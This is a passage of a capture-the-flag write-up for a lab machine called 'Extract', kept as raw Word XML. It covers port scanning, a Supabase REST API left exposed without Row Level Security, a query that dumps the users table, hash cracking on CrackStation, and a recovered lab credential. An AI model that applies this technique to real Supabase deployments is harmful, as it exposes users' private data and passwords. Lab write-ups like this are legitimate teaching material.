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sblqsykefzju"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dp9sn2nfz9dl"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This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Extract</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </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If you need support, please open a ticket in the</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">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hyperlink>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>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pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rij5mnudw5nj" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We began enumeration of the machine using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with the objective of identifying which ports and services were exposed on the target. The scan allowed us to map open ports and served as the foundation for the next stages of enumeration and exploitation.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841988"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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8419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the Nmap scan, the following open ports were identified on the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="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22 (SSH):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure remote access.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="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80 (HTTP):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> web server.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="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54321, 54322, 54323, 54324, 54327:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> services related to  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,  possibly databases or APIs associated with the platform.</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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="118"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web application available on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80 (HTTP)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a login </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">form </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was identified, requiring a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username and password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the system.</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70300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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54323, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase web interface</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was identified, indicating that platform services were externally exposed.</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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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87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Through this fully exposed interface, it was possible to view internal database information, including</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> schemas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and the table names</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> private_data and users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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25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spacing w:after="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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supabase AP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I was also exposed on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 54321</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it became possible to query the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data directly through the REST API</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, provided that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Row Level Security (RLS)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was not enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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RLS (Row Level Security)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an access control mechanism in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase/PostgreSQ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L that allows defining row-level access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">policies in database tables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS enabled</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, each query to a table is filtered according to defined rules (for example, allowing each user to see only their own rows). If </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is disabled, any API request can access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all rows in the table</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, exposing sensitive information and increasing the risk of data leakage.</w:t>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t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was not enabled, it was possible to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> fully access the table data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing visibility of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all stored information</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any row-level access restrictions.</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http://&lt;machine-ip&gt;:54321/rest/v1/users</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6163"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="122"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29561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 obtained </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password hashes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were submitted to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CrackStation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website, where it was possible to crack the hash and recover t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">he plaintext passwor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">d, as well as identify the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user token for kenaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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2A">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kenaz:dominican</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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00122</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
